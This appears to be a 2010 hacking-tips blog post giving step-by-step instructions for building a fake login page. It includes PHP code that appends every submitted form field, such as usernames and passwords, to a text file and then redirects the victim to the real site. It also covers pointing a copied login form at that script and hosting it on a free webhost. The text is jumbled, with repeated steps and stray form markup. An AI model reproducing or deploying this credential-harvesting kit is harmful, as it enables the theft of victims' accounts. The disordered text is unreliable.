| Country Rank: | 52 |
|---|---|
| World Rank: | 444 |
| Profile Viewed: | 440 |
| Points: | 440 |
|
19 May
2010
|
FAKE LOGIN PAGES |
FAKE LOG IN PAGES.
6. Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL. The HTML code should start with something like this:
7. Once everything is complete, upload the files to a free webhost that supports PHP. UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.01.<!--p 02.Header("Location: http://www.RealSite.com"); 03. 04.$handle = fopen("list.txt", "a"); 05. 06.foreach($_GET as $variable => $value) { 07. 08.fwrite($handle, $variable); 09.fwrite($handle, "="); 10.fwrite($handle, $value); 11.fwrite($handle, "\r\n"); 12.}fwrite($handle, "\r\n"); 13. 14.fclose($handle); 15.exit; 16.?>
8. That’s it! You’ve just created a phishing page.
7. Once everything is complete, upload the files to a free webhost that supports PHP.
8. That’s it! You’ve just created a phishing page.
UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.
</form>> FOR MORE HACKING TIPS AND TRICKS<form action="”sitelinkhere.com”" accept-charset="UNKNOWN" enctype="application/x-www-form-urlencoded" method="get">>
I’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.